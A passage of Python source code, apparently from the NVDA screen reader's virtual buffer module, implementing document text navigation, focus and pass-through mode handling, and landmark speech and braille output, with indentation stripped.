return True
except (KeyError, ValueError, TypeError):
return False
return super(VirtualBufferQuickNavItem,self).isChild(parent)
canActivate=True
def activate(self):
self.textInfo.obj._activatePosition(self.textInfo)
def moveTo(self):
info=self.textInfo.copy()
info.collapse()
self.document._set_selection(info,reason=browseMode.REASON_QUICKNAV)
class VirtualBufferTextInfo(textInfos.offsets.OffsetsTextInfo):
allowMoveToOffsetPastEnd=False #: no need for end insertion point as vbuf is not editable.
UNIT_CONTROLFIELD = "controlField"
def _getControlFieldAttribs(self, docHandle, id):
info = self.copy()
info.expand(textInfos.UNIT_CHARACTER)
for field in reversed(info.getTextWithFields()):
if not (isinstance(field, textInfos.FieldCommand) and field.command == "controlStart"):
# Not a control field.
continue
attrs = field.field
if int(attrs["controlIdentifier_docHandle"]) == docHandle and int(attrs["controlIdentifier_ID"]) == id:
return attrs
raise LookupError
def _getFieldIdentifierFromOffset(self, offset):
startOffset = ctypes.c_int()
endOffset = ctypes.c_int()
docHandle = ctypes.c_int()
ID = ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle, offset, ctypes.byref(startOffset), ctypes.byref(endOffset), ctypes.byref(docHandle), ctypes.byref(ID),ctypes.byref(node))
return docHandle.value, ID.value
def _getOffsetsFromFieldIdentifier(self, docHandle, ID):
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_getControlFieldNodeWithIdentifier(self.obj.VBufHandle, docHandle, ID,ctypes.byref(node))
if not node:
raise LookupError
start = ctypes.c_int()
end = ctypes.c_int()
NVDAHelper.localLib.VBuf_getFieldNodeOffsets(self.obj.VBufHandle, node, ctypes.byref(start), ctypes.byref(end))
return start.value, end.value
def _getPointFromOffset(self,offset):
o = self._getNVDAObjectFromOffset(offset)
left, top, width, height = o.location
return textInfos.Point(left + width / 2, top + height / 2)
def _getNVDAObjectFromOffset(self,offset):
docHandle,ID=self._getFieldIdentifierFromOffset(offset)
return self.obj.getNVDAObjectFromIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObjectInBuffer(self,obj):
docHandle,ID=self.obj.getIdentifierFromNVDAObject(obj)
return self._getOffsetsFromFieldIdentifier(docHandle,ID)
def _getOffsetsFromNVDAObject(self, obj):
while True:
try:
return self._getOffsetsFromNVDAObjectInBuffer(obj)
except LookupError:
pass
# Interactive list/combo box/tree view descendants aren't rendered into the buffer, even though they are still considered part of it.
# Use the container in this case.
obj = obj.parent
if not obj or obj.role not in (controlTypes.ROLE_LIST, controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_GROUPING, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM):
break
raise LookupError
def __init__(self,obj,position):
self.obj=obj
super(VirtualBufferTextInfo,self).__init__(obj,position)
def _getSelectionOffsets(self):
start=ctypes.c_int()
end=ctypes.c_int()
NVDAHelper.localLib.VBuf_getSelectionOffsets(self.obj.VBufHandle,ctypes.byref(start),ctypes.byref(end))
return start.value,end.value
def _setSelectionOffsets(self,start,end):
NVDAHelper.localLib.VBuf_setSelectionOffsets(self.obj.VBufHandle,start,end)
def _getCaretOffset(self):
return self._getSelectionOffsets()[0]
def _setCaretOffset(self,offset):
return self._setSelectionOffsets(offset,offset)
def _getStoryLength(self):
return NVDAHelper.localLib.VBuf_getTextLength(self.obj.VBufHandle)
def _getTextRange(self,start,end):
if start==end:
return u""
return NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,False) or u""
def getTextWithFields(self,formatConfig=None):
start=self._startOffset
end=self._endOffset
if start==end:
return ""
text=NVDAHelper.VBuf_getTextInRange(self.obj.VBufHandle,start,end,True)
if not text:
return ""
commandList=XMLFormatting.XMLTextParser().parse(text)
for index in xrange(len(commandList)):
if isinstance(commandList[index],textInfos.FieldCommand):
field=commandList[index].field
if isinstance(field,textInfos.ControlField):
commandList[index].field=self._normalizeControlField(field)
elif isinstance(field,textInfos.FormatField):
commandList[index].field=self._normalizeFormatField(field)
return commandList
def _getWordOffsets(self,offset):
#Use VBuf_getLineOffsets without screen layout to find out the range of the current field
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,False,ctypes.byref(lineStart),ctypes.byref(lineEnd))
word_startOffset,word_endOffset=super(VirtualBufferTextInfo,self)._getWordOffsets(offset)
return (max(lineStart.value,word_startOffset),min(lineEnd.value,word_endOffset))
def _getLineOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,config.conf["virtualBuffers"]["maxLineLength"],config.conf["virtualBuffers"]["useScreenLayout"],ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _getParagraphOffsets(self,offset):
lineStart=ctypes.c_int()
lineEnd=ctypes.c_int()
NVDAHelper.localLib.VBuf_getLineOffsets(self.obj.VBufHandle,offset,0,True,ctypes.byref(lineStart),ctypes.byref(lineEnd))
return lineStart.value,lineEnd.value
def _normalizeControlField(self,attrs):
tableLayout=attrs.get('table-layout')
if tableLayout:
attrs['table-layout']=tableLayout=="1"
isHidden=attrs.get('isHidden')
if isHidden:
attrs['isHidden']=isHidden=="1"
# Handle table row and column headers.
for axis in "row", "column":
attr = attrs.pop("table-%sheadercells" % axis, None)
if not attr:
continue
cellIdentifiers = [identifier.split(",") for identifier in attr.split(";") if identifier]
# Get the text for the header cells.
textList = []
for docHandle, ID in cellIdentifiers:
try:
start, end = self._getOffsetsFromFieldIdentifier(int(docHandle), int(ID))
except (LookupError, ValueError):
continue
textList.append(self.obj.makeTextInfo(textInfos.offsets.Offsets(start, end)).text)
attrs["table-%sheadertext" % axis] = "\n".join(textList)
if attrs.get("landmark") == "region" and not attrs.get("name"):
# We only consider region to be a landmark if it has a name.
del attrs["landmark"]
# Expose a unique ID on the controlField for quick and safe comparison using the virtualBuffer field's docHandle and ID
docHandle=attrs.get('controlIdentifier_docHandle')
ID=attrs.get('controlIdentifier_ID')
if docHandle is not None and ID is not None:
attrs['uniqueID']=(docHandle,ID)
return attrs
def _normalizeFormatField(self, attrs):
return attrs
def _getLineNumFromOffset(self, offset):
return None
def _get_fieldIdentifierAtStart(self):
return self._getFieldIdentifierFromOffset( self._startOffset)
def _getUnitOffsets(self, unit, offset):
if unit == self.UNIT_CONTROLFIELD:
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
docHandle=ctypes.c_int()
ID=ctypes.c_int()
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_locateControlFieldNodeAtOffset(self.obj.VBufHandle,offset,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(docHandle),ctypes.byref(ID),ctypes.byref(node))
return startOffset.value,endOffset.value
return super(VirtualBufferTextInfo, self)._getUnitOffsets(unit, offset)
def _get_clipboardText(self):
# Blocks should start on a new line, but they don't necessarily have an end of line indicator.
# Therefore, get the text in block (paragraph) chunks and join the chunks with \r\n.
blocks = (block.strip("\r\n") for block in self.getTextInChunks(textInfos.UNIT_PARAGRAPH))
return "\r\n".join(blocks)
def getControlFieldSpeech(self, attrs, ancestorAttrs, fieldType, formatConfig=None, extraDetail=False, reason=None):
textList = []
landmark = attrs.get("landmark")
if formatConfig["reportLandmarks"] and fieldType == "start_addedToControlFieldStack" and landmark:
try:
textList.append(attrs["name"])
except KeyError:
pass
if landmark == "region":
# The word landmark is superfluous for regions.
textList.append(aria.landmarkRoles[landmark])
else:
textList.append(_("%s landmark") % aria.landmarkRoles[landmark])
textList.append(super(VirtualBufferTextInfo, self).getControlFieldSpeech(attrs, ancestorAttrs, fieldType, formatConfig, extraDetail, reason))
return " ".join(textList)
def getControlFieldBraille(self, field, ancestors, reportStart, formatConfig):
textList = []
landmark = field.get("landmark")
if formatConfig["reportLandmarks"] and reportStart and landmark and field.get("_startOfNode"):
try:
textList.append(field["name"])
except KeyError:
pass
if landmark == "region":
# The word landmark is superfluous for regions.
textList.append(aria.landmarkRoles[landmark])
else:
# Translators: This is spoken and brailled to indicate a landmark (example output: main landmark).
textList.append(_("%s landmark") % aria.landmarkRoles[landmark])
text = super(VirtualBufferTextInfo, self).getControlFieldBraille(field, ancestors, reportStart, formatConfig)
if text:
textList.append(text)
return " ".join(textList)
def _get_focusableNVDAObjectAtStart(self):
try:
item = next(self.obj._iterNodesByType("focusable", "up", self))
except StopIteration:
return self.obj.rootNVDAObject
if not item:
return self.obj.rootNVDAObject
return self.obj.getNVDAObjectFromIdentifier(*item.vbufFieldIdentifier)
def activate(self):
self.obj._activatePosition(self)
def getMathMl(self, field):
docHandle = int(field["controlIdentifier_docHandle"])
nodeId = int(field["controlIdentifier_ID"])
obj = self.obj.getNVDAObjectFromIdentifier(docHandle, nodeId)
return obj.mathMl
class VirtualBuffer(cursorManager.CursorManager, browseMode.BrowseModeTreeInterceptor, treeInterceptorHandler.DocumentTreeInterceptor):
TextInfo=VirtualBufferTextInfo
programmaticScrollMayFireEvent = False
#: Maps root identifiers (docHandle and ID) to buffers.
rootIdentifiers = weakref.WeakValueDictionary()
def __init__(self,rootNVDAObject,backendName=None):
super(VirtualBuffer,self).__init__(rootNVDAObject)
self.backendName=backendName
self.VBufHandle=None
self.isLoading=False
self.disableAutoPassThrough = False
self.rootDocHandle,self.rootID=self.getIdentifierFromNVDAObject(self.rootNVDAObject)
self._lastFocusObj = None
self._hadFirstGainFocus = False
self._lastProgrammaticScrollTime = None
# We need to cache this because it will be unavailable once the document dies.
self.documentConstantIdentifier = self.documentConstantIdentifier
if not hasattr(self.rootNVDAObject.appModule, "_vbufRememberedCaretPositions"):
self.rootNVDAObject.appModule._vbufRememberedCaretPositions = {}
self._lastCaretPosition = None
self.rootIdentifiers[self.rootDocHandle, self.rootID] = self
self._enteringFromOutside = True
def prepare(self):
self.shouldPrepare=False
self.loadBuffer()
def _get_shouldPrepare(self):
return not self.isLoading and not self.VBufHandle
def terminate(self):
if not self.VBufHandle:
return
if self.shouldRememberCaretPositionAcrossLoads and self._lastCaretPosition:
try:
self.rootNVDAObject.appModule._vbufRememberedCaretPositions[self.documentConstantIdentifier] = self._lastCaretPosition
except AttributeError:
# The app module died.
pass
self.unloadBuffer()
def _get_isReady(self):
return bool(self.VBufHandle and not self.isLoading)
def loadBuffer(self):
self.isLoading = True
self._loadProgressCallLater = wx.CallLater(1000, self._loadProgress)
threading.Thread(target=self._loadBuffer).start()
def _loadBuffer(self):
try:
self.VBufHandle=NVDAHelper.localLib.VBuf_createBuffer(self.rootNVDAObject.appModule.helperLocalBindingHandle,self.rootDocHandle,self.rootID,unicode(self.backendName))
if not self.VBufHandle:
raise RuntimeError("Could not remotely create virtualBuffer")
except:
log.error("", exc_info=True)
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone, success=False)
return
queueHandler.queueFunction(queueHandler.eventQueue, self._loadBufferDone)
def _loadBufferDone(self, success=True):
self._loadProgressCallLater.Stop()
del self._loadProgressCallLater
self.isLoading = False
if not success:
self.passThrough=True
return
if self._hadFirstGainFocus:
# If this buffer has already had focus once while loaded, this is a refresh.
# Translators: Reported when a page reloads (example: after refreshing a webpage).
speech.speakMessage(_("Refreshed"))
if api.getFocusObject().treeInterceptor == self:
self.event_treeInterceptor_gainFocus()
def _loadProgress(self):
# Translators: Reported while loading a document.
ui.message(_("Loading document..."))
def unloadBuffer(self):
if self.VBufHandle is not None:
try:
watchdog.cancellableExecute(NVDAHelper.localLib.VBuf_destroyBuffer, ctypes.byref(ctypes.c_int(self.VBufHandle)))
except WindowsError:
pass
self.VBufHandle=None
def isNVDAObjectPartOfLayoutTable(self,obj):
docHandle,ID=self.getIdentifierFromNVDAObject(obj)
ID=unicode(ID)
info=self.makeTextInfo(obj)
info.collapse()
info.expand(textInfos.UNIT_CHARACTER)
fieldCommands=[x for x in info.getTextWithFields() if isinstance(x,textInfos.FieldCommand)]
tableLayout=None
tableID=None
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==ID:
tableLayout=fieldCommand.field.get('table-layout')
if tableLayout is not None:
return tableLayout
tableID=fieldCommand.field.get('table-id')
break
if tableID is None:
return False
for fieldCommand in fieldCommands:
fieldID=fieldCommand.field.get("controlIdentifier_ID") if fieldCommand.field else None
if fieldID==tableID:
tableLayout=fieldCommand.field.get('table-layout',False)
break
return tableLayout
def getNVDAObjectFromIdentifier(self, docHandle, ID):
"""Retrieve an NVDAObject for a given node identifier.
Subclasses must override this method.
@param docHandle: The document handle.
@type docHandle: int
@param ID: The ID of the node.
@type ID: int
@return: The NVDAObject.
@rtype: L{NVDAObjects.NVDAObject}
"""
raise NotImplementedError
def getIdentifierFromNVDAObject(self,obj):
"""Retreaves the virtualBuffer field identifier from an NVDAObject.
@param obj: the NVDAObject to retreave the field identifier from.
@type obj: L{NVDAObject}
@returns: a the field identifier as a doc handle and ID paire.
@rtype: 2-tuple.
"""
raise NotImplementedError
def event_treeInterceptor_gainFocus(self):
"""Triggered when this virtual buffer gains focus.
This event is only fired upon entering this buffer when it was not the current buffer before.
This is different to L{event_gainFocus}, which is fired when an object inside this buffer gains focus, even if that object is in the same buffer.
"""
doSayAll=False
hadFirstGainFocus=self._hadFirstGainFocus
if not hadFirstGainFocus:
# This buffer is gaining focus for the first time.
# Fake a focus event on the focus object, as the buffer may have missed the actual focus event.
focus = api.getFocusObject()
self.event_gainFocus(focus, lambda: focus.event_gainFocus())
if not self.passThrough:
# We only set the caret position if in browse mode.
# If in focus mode, the document must have forced the focus somewhere,
# so we don't want to override it.
initialPos = self._getInitialCaretPos()
if initialPos:
self.selection = self.makeTextInfo(initialPos)
browseMode.reportPassThrough(self)
doSayAll=config.conf['virtualBuffers']['autoSayAllOnPageLoad']
self._hadFirstGainFocus = True
if not self.passThrough:
if doSayAll:
speech.speakObjectProperties(self.rootNVDAObject,name=True,states=True,reason=controlTypes.REASON_FOCUS)
sayAllHandler.readText(sayAllHandler.CURSOR_CARET)
else:
# Speak it like we would speak focus on any other document object.
# This includes when entering the treeInterceptor for the first time:
if not hadFirstGainFocus:
speech.speakObject(self.rootNVDAObject, reason=controlTypes.REASON_FOCUS)
else:
# And when coming in from an outside object
# #4069 But not when coming up from a non-rendered descendant.
ancestors=api.getFocusAncestors()
fdl=api.getFocusDifferenceLevel()
try:
tl=ancestors.index(self.rootNVDAObject)
except ValueError:
tl=len(ancestors)
if fdl<=tl:
speech.speakObject(self.rootNVDAObject, reason=controlTypes.REASON_FOCUS)
info = self.selection
if not info.isCollapsed:
speech.speakSelectionMessage(_("selected %s"), info.text)
else:
info.expand(textInfos.UNIT_LINE)
speech.speakTextInfo(info, reason=controlTypes.REASON_CARET, unit=textInfos.UNIT_LINE)
browseMode.reportPassThrough(self)
braille.handler.handleGainFocus(self)
def event_treeInterceptor_loseFocus(self):
"""Triggered when this virtual buffer loses focus.
This event is only fired when the focus moves to a new object which is not within this virtual buffer; i.e. upon leaving this virtual buffer.
"""
def event_caret(self, obj, nextHandler):
if self.passThrough:
nextHandler()
def _activateNVDAObject(self, obj):
"""Activate an object in response to a user request.
This should generally perform the default action or click on the object.
@param obj: The object to activate.
@type obj: L{NVDAObjects.NVDAObject}
"""
obj.doAction()
def _activateLongDesc(self,controlField):
"""
Activates (presents) the long description for a particular field (usually a graphic).
		@param controlField: the field whose long description should be activated. This field is guaranteed to have states containing the HASLONGDESC state.
@type controlField: dict
"""
raise NotImplementedError
def _activatePosition(self, info):
obj = info.NVDAObjectAtStart
if not obj:
return
if obj.role == controlTypes.ROLE_MATH:
import mathPres
try:
return mathPres.interactWithMathMl(obj.mathMl)
except (NotImplementedError, LookupError):
pass
return
if self.shouldPassThrough(obj):
obj.setFocus()
self.passThrough = True
browseMode.reportPassThrough(self)
elif obj.role == controlTypes.ROLE_EMBEDDEDOBJECT or obj.role in self.APPLICATION_ROLES:
obj.setFocus()
speech.speakObject(obj, reason=controlTypes.REASON_FOCUS)
else:
self._activateNVDAObject(obj)
def _set_selection(self, info, reason=controlTypes.REASON_CARET):
super(VirtualBuffer, self)._set_selection(info)
if isScriptWaiting() or not info.isCollapsed:
return
# Save the last caret position for use in terminate().
# This must be done here because the buffer might be cleared just before terminate() is called,
# causing the last caret position to be lost.
caret = info.copy()
caret.collapse()
self._lastCaretPosition = caret.bookmark
review.handleCaretMove(caret)
if reason == controlTypes.REASON_FOCUS:
focusObj = api.getFocusObject()
if focusObj==self.rootNVDAObject:
return
else:
focusObj=info.focusableNVDAObjectAtStart
obj=info.NVDAObjectAtStart
if not obj:
log.debugWarning("Invalid NVDAObjectAtStart")
return
if obj==self.rootNVDAObject:
return
if focusObj and not eventHandler.isPendingEvents("gainFocus") and focusObj!=self.rootNVDAObject and focusObj != api.getFocusObject() and self._shouldSetFocusToObj(focusObj):
focusObj.setFocus()
obj.scrollIntoView()
if self.programmaticScrollMayFireEvent:
self._lastProgrammaticScrollTime = time.time()
self.passThrough=self.shouldPassThrough(focusObj,reason=reason)
# Queue the reporting of pass through mode so that it will be spoken after the actual content.
queueHandler.queueFunction(queueHandler.eventQueue, browseMode.reportPassThrough, self)
def _shouldSetFocusToObj(self, obj):
"""Determine whether an object should receive focus.
Subclasses may extend or override this method.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
"""
return obj.role not in self.APPLICATION_ROLES and obj.isFocusable and obj.role!=controlTypes.ROLE_EMBEDDEDOBJECT
def script_activateLongDesc(self,gesture):
info=self.makeTextInfo(textInfos.POSITION_CARET)
info.expand("character")
for field in reversed(info.getTextWithFields()):
if isinstance(field,textInfos.FieldCommand) and field.command=="controlStart":
states=field.field.get('states')
if states and controlTypes.STATE_HASLONGDESC in states:
self._activateLongDesc(field.field)
break
else:
# Translators: the message presented when the activateLongDescription script cannot locate a long description to activate.
ui.message(_("No long description"))
# Translators: the description for the activateLongDescription script on virtualBuffers.
script_activateLongDesc.__doc__=_("Shows the long description at this position if one is found.")
def script_refreshBuffer(self,gesture):
if scriptHandler.isScriptWaiting():
# This script may cause subsequently queued scripts to fail, so don't execute.
return
self.unloadBuffer()
self.loadBuffer()
# Translators: the description for the refreshBuffer script on virtualBuffers.
script_refreshBuffer.__doc__ = _("Refreshes the document content")
def script_toggleScreenLayout(self,gesture):
config.conf["virtualBuffers"]["useScreenLayout"]=not config.conf["virtualBuffers"]["useScreenLayout"]
if config.conf["virtualBuffers"]["useScreenLayout"]:
# Translators: Presented when use screen layout option is toggled.
speech.speakMessage(_("use screen layout on"))
else:
# Translators: Presented when use screen layout option is toggled.
speech.speakMessage(_("use screen layout off"))
# Translators: the description for the toggleScreenLayout script on virtualBuffers.
script_toggleScreenLayout.__doc__ = _("Toggles on and off if the screen layout is preserved while rendering the document content")
	def _searchableAttribsForNodeType(self,nodeType):
pass
def _iterNodesByType(self,nodeType,direction="next",pos=None):
if nodeType == "notLinkBlock":
return self._iterNotLinkBlock(direction=direction, pos=pos)
attribs=self._searchableAttribsForNodeType(nodeType)
if not attribs:
return iter(())
return self._iterNodesByAttribs(attribs, direction, pos,nodeType)
def _iterNodesByAttribs(self, attribs, direction="next", pos=None,nodeType=None):
offset=pos._startOffset if pos else -1
reqAttrs, regexp = _prepareForFindByAttributes(attribs)
startOffset=ctypes.c_int()
endOffset=ctypes.c_int()
if direction=="next":
direction=VBufStorage_findDirection_forward
elif direction=="previous":
direction=VBufStorage_findDirection_back
elif direction=="up":
direction=VBufStorage_findDirection_up
else:
raise ValueError("unknown direction: %s"%direction)
while True:
try:
node=VBufRemote_nodeHandle_t()
NVDAHelper.localLib.VBuf_findNodeByAttributes(self.VBufHandle,offset,direction,reqAttrs,regexp,ctypes.byref(startOffset),ctypes.byref(endOffset),ctypes.byref(node))
except:
return
if not node:
return
yield VirtualBufferQuickNavItem(nodeType,self,node,startOffset.value,endOffset.value)
offset=startOffset
def shouldPassThrough(self, obj, reason=None):
"""Determine whether pass through mode should be enabled or disabled for a given object.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
@param reason: The reason for this query; one of the output reasons, L{REASON_QUICKNAV}, or C{None} for manual pass through mode activation by the user.
@return: C{True} if pass through mode should be enabled, C{False} if it should be disabled.
"""
if reason and (
self.disableAutoPassThrough
or (reason == controlTypes.REASON_FOCUS and not config.conf["virtualBuffers"]["autoPassThroughOnFocusChange"])
or (reason == controlTypes.REASON_CARET and not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"])
):
# This check relates to auto pass through and auto pass through is disabled, so don't change the pass through state.
return self.passThrough
if reason == browseMode.REASON_QUICKNAV:
return False
states = obj.states
role = obj.role
# Menus sometimes get focus due to menuStart events even though they don't report as focused/focusable.
if not obj.isFocusable and controlTypes.STATE_FOCUSED not in states and role != controlTypes.ROLE_POPUPMENU:
return False
if controlTypes.STATE_READONLY in states and role not in (controlTypes.ROLE_EDITABLETEXT, controlTypes.ROLE_COMBOBOX):
return False
if reason == controlTypes.REASON_CARET:
return role == controlTypes.ROLE_EDITABLETEXT or (role == controlTypes.ROLE_DOCUMENT and controlTypes.STATE_EDITABLE in states)
if reason == controlTypes.REASON_FOCUS and role in (controlTypes.ROLE_LISTITEM, controlTypes.ROLE_RADIOBUTTON, controlTypes.ROLE_TAB):
return True
if role in (controlTypes.ROLE_COMBOBOX, controlTypes.ROLE_EDITABLETEXT, controlTypes.ROLE_LIST, controlTypes.ROLE_SLIDER, controlTypes.ROLE_TABCONTROL, controlTypes.ROLE_MENUBAR, controlTypes.ROLE_POPUPMENU, controlTypes.ROLE_MENUITEM, controlTypes.ROLE_TREEVIEW, controlTypes.ROLE_TREEVIEWITEM, controlTypes.ROLE_SPINBUTTON, controlTypes.ROLE_TABLEROW, controlTypes.ROLE_TABLECELL, controlTypes.ROLE_TABLEROWHEADER, controlTypes.ROLE_TABLECOLUMNHEADER, controlTypes.ROLE_CHECKMENUITEM, controlTypes.ROLE_RADIOMENUITEM) or controlTypes.STATE_EDITABLE in states:
return True
if reason == controlTypes.REASON_FOCUS:
# If this is a focus change, pass through should be enabled for certain ancestor containers.
while obj and obj != self.rootNVDAObject:
if obj.role == controlTypes.ROLE_TOOLBAR:
return True
obj = obj.parent
return False
def event_caretMovementFailed(self, obj, nextHandler, gesture=None):
if not self.passThrough or not gesture or not config.conf["virtualBuffers"]["autoPassThroughOnCaretMove"]:
return nextHandler()
if gesture.mainKeyName in ("home", "end"):
# Home, end, control+home and control+end should not disable pass through.
return nextHandler()
script = self.getScript(gesture)
if not script:
return nextHandler()
# We've hit the edge of the focused control.
# Therefore, move the virtual caret to the same edge of the field.
info = self.makeTextInfo(textInfos.POSITION_CARET)
info.expand(info.UNIT_CONTROLFIELD)
if gesture.mainKeyName in ("leftArrow", "upArrow", "pageUp"):
info.collapse()
else:
info.collapse(end=True)
info.move(textInfos.UNIT_CHARACTER, -1)
info.updateCaret()
scriptHandler.queueScript(script, gesture)
def script_disablePassThrough(self, gesture):
if not self.passThrough or self.disableAutoPassThrough:
return gesture.send()
self.passThrough = False
self.disableAutoPassThrough = False
browseMode.reportPassThrough(self)
script_disablePassThrough.ignoreTreeInterceptorPassThrough = True
def script_collapseOrExpandControl(self, gesture):
oldFocus = api.getFocusObject()
oldFocusStates = oldFocus.states
gesture.send()
if controlTypes.STATE_COLLAPSED in oldFocusStates:
self.passThrough = True
elif not self.disableAutoPassThrough:
self.passThrough = False
browseMode.reportPassThrough(self)
script_collapseOrExpandControl.ignoreTreeInterceptorPassThrough = True
def _tabOverride(self, direction):
"""Override the tab order if the virtual buffer caret is not within the currently focused node.
This is done because many nodes are not focusable and it is thus possible for the virtual buffer caret to be unsynchronised with the focus.
In this case, we want tab/shift+tab to move to the next/previous focusable node relative to the virtual buffer caret.
If the virtual buffer caret is within the focused node, the tab/shift+tab key should be passed through to allow normal tab order navigation.
Note that this method does not pass the key through itself if it is not overridden. This should be done by the calling script if C{False} is returned.
@param direction: The direction in which to move.
@type direction: str
@return: C{True} if the tab order was overridden, C{False} if not.
@rtype: bool
"""
focus = api.getFocusObject()
try:
focusInfo = self.makeTextInfo(focus)
except:
return False
# We only want to override the tab order if the caret is not within the focused node.
caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
		#Only check that the caret is within the focus for things that are not documents
#As for documents we should always override
if focus.role!=controlTypes.ROLE_DOCUMENT or controlTypes.STATE_EDITABLE in focus.states:
# Expand to one character, as isOverlapping() doesn't yield the desired results with collapsed ranges.
caretInfo.expand(textInfos.UNIT_CHARACTER)
if focusInfo.isOverlapping(caretInfo):
return False
# If we reach here, we do want to override tab/shift+tab if possible.
# Find the next/previous focusable node.
try:
item = next(self._iterNodesByType("focusable", direction, caretInfo))
except StopIteration:
return False
obj=self.getNVDAObjectFromIdentifier(*item.vbufFieldIdentifier)
newInfo=item.textInfo
if obj == api.getFocusObject():
# This node is already focused, so we need to move to and speak this node here.
newCaret = newInfo.copy()
newCaret.collapse()
self._set_selection(newCaret,reason=controlTypes.REASON_FOCUS)
if self.passThrough:
obj.event_gainFocus()
else:
speech.speakTextInfo(newInfo,reason=controlTypes.REASON_FOCUS)
else:
# This node doesn't have the focus, so just set focus to it. The gainFocus event will handle the rest.
obj.setFocus()
return True
def script_tab(self, gesture):
if not self._tabOverride("next"):
gesture.send()
def script_shiftTab(self, gesture):
if not self._tabOverride("previous"):
gesture.send()
def event_focusEntered(self,obj,nextHandler):
if obj==self.rootNVDAObject:
self._enteringFromOutside = True
if self.passThrough:
nextHandler()
def _shouldIgnoreFocus(self, obj):
"""Determines whether focus on a given object should be ignored.
@param obj: The object in question.
@type obj: L{NVDAObjects.NVDAObject}
@return: C{True} if focus on L{obj} should be ignored, C{False} otherwise.
@rtype: bool
"""
return False
def _postGainFocus(self, obj):
"""Executed after a gainFocus within the virtual buffer.
This will not be executed if L{event_gainFocus} determined that it should abort and call nextHandler.
@param obj: The object that gained focus.
@type obj: L{NVDAObjects.NVDAObject}
"""
def _replayFocusEnteredEvents(self):
# We blocked the focusEntered events because we were in browse mode,
# but now that we've switched to focus mode, we need to fire them.
for parent in api.getFocusAncestors()[api.getFocusDifferenceLevel():]:
try:
parent.event_focusEntered()
except:
log.exception("Error executing focusEntered event: %s" % parent)
def event_gainFocus(self, obj, nextHandler):
enteringFromOutside=self._enteringFromOutside
self._enteringFromOutside=False
if not self.isReady:
if self.passThrough:
nextHandler()
return
if enteringFromOutside and not self.passThrough and self._lastFocusObj==obj:
# We're entering the document from outside (not returning from an inside object/application; #3145)
# and this was the last non-root node with focus, so ignore this focus event.
# Otherwise, if the user switches away and back to this document, the cursor will jump to this node.
# This is not ideal if the user was positioned over a node which cannot receive focus.
return
if obj==self.rootNVDAObject:
if self.passThrough:
return nextHandler()
return
if not self.passThrough and self._shouldIgnoreFocus(obj):
return
self._lastFocusObj=obj
try:
focusInfo = self.makeTextInfo(obj)
except:
# This object is not in the virtual buffer, even though it resides beneath the document.
# Automatic pass through should be enabled in certain circumstances where this occurs.
if not self.passThrough and self.shouldPassThrough(obj,reason=controlTypes.REASON_FOCUS):
self.passThrough=True
browseMode.reportPassThrough(self)
self._replayFocusEnteredEvents()
return nextHandler()
#We only want to update the caret and speak the field if we're not in the same one as before
caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
# Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping.
caretInfo.expand(textInfos.UNIT_CHARACTER)
if not self._hadFirstGainFocus or not focusInfo.isOverlapping(caretInfo):
# The virtual buffer caret is not within the focus node.
oldPassThrough=self.passThrough
passThrough=self.shouldPassThrough(obj,reason=controlTypes.REASON_FOCUS)
if not oldPassThrough and (passThrough or sayAllHandler.isRunning()):
# If pass-through is disabled, cancel speech, as a focus change should cause page reading to stop.
# This must be done before auto-pass-through occurs, as we want to stop page reading even if pass-through will be automatically enabled by this focus change.
speech.cancelSpeech()
self.passThrough=passThrough
if not self.passThrough:
# We read the info from the buffer instead of the control itself.
speech.speakTextInfo(focusInfo,reason=controlTypes.REASON_FOCUS)
# However, we still want to update the speech property cache so that property changes will be spoken properly.
speech.speakObject(obj,controlTypes.REASON_ONLYCACHE)
else:
if not oldPassThrough:
self._replayFocusEnteredEvents()
nextHandler()
focusInfo.collapse()
self._set_selection(focusInfo,reason=controlTypes.REASON_FOCUS)
else:
# The virtual buffer caret was already at the focused node.
if not self.passThrough:
# This focus change was caused by a virtual caret movement, so don't speak the focused node to avoid double speaking.
# However, we still want to update the speech property cache so that property changes will be spoken properly.
speech.speakObject(obj,controlTypes.REASON_ONLYCACHE)
else:
return nextHandler()
self._postGainFocus(obj)
event_gainFocus.ignoreIsReady=True
def _handleScrollTo(self, obj):
"""Handle scrolling the buffer to a given object in response to an event.
Subclasses should call this from an event which indicates that the buffer has scrolled.
@postcondition: The buffer caret is moved to L{obj} and the buffer content for L{obj} is reported.
@param obj: The object to which the buffer should scroll.
@type obj: L{NVDAObjects.NVDAObject}
@return: C{True} if the buffer was scrolled, C{False} if not.
@rtype: bool
@note: If C{False} is returned, calling events should probably call their nextHandler.
"""
if self.programmaticScrollMayFireEvent and self._lastProgrammaticScrollTime and time.time() - self._lastProgrammaticScrollTime < 0.4:
# This event was probably caused by this buffer's call to scrollIntoView().
# Therefore, ignore it. Otherwise, the cursor may bounce back to the scroll point.
# However, pretend we handled it, as we don't want it to be passed on to the object either.
return True
try:
scrollInfo = self.makeTextInfo(obj)
except:
return False
#We only want to update the caret and speak the field if we're not in the same one as before
caretInfo=self.makeTextInfo(textInfos.POSITION_CARET)
# Expand to one character, as isOverlapping() doesn't treat, for example, (4,4) and (4,5) as overlapping.
caretInfo.expand(textInfos.UNIT_CHARACTER)
